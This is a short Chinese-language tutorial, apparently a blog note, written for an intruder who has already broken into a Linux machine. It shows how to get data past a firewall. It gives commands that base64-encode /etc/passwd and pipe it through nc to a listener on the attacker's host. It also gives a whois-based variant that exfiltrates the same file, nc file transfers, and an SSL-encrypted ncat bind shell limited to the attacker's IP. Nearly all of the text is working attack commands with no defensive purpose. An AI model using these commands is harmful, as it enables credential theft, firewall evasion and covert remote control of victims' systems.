这里简单介绍一下,情况是这样
我们入侵Linux之后,植入nc后,想盗取部分内容无法直接传输,因为会遇到防火墙的拦截,这里就需要进行加密传输。
黑客端:
nc -l -p 8889 > kali.txt
受害端Linux系统:
cat /etc/passwd | base64 | nc -nv [黑客ip] 3333 -q 1
然后黑客端的nc目录下会生成一个kali.txt,里面存放了base64加密之后的passwd内容
传输文件:
控制端:
nc -l -p 8889 > poc.py
被控端:
nc -nv 10.0.79.241 8889 < ./poc.py -q 1
传输的文件接收的时候命名最好是一样的
文件基本不会被防火墙拦截
在两台都是Linux的情况下,目标机器无法上传nc,可以利用whois的命令来完成
黑客机器:
nc -l -v -p 8889 |sed "s/ //g" | base64 -d
目标机器:
whois -h [黑客IP] -p 8889 `cat /etc/passwd | base64 `
两台都是linux,并且要加密通信
nc的加密版ncat
目标:
ncat -c bash --allow [黑客ip] -vnl 3333 --ssl
只允许黑客的ip去控制它
黑客:
nc -nv [目标ip] 3333 --ssl
这样我们的一个命令传输过程就是完全加密了的。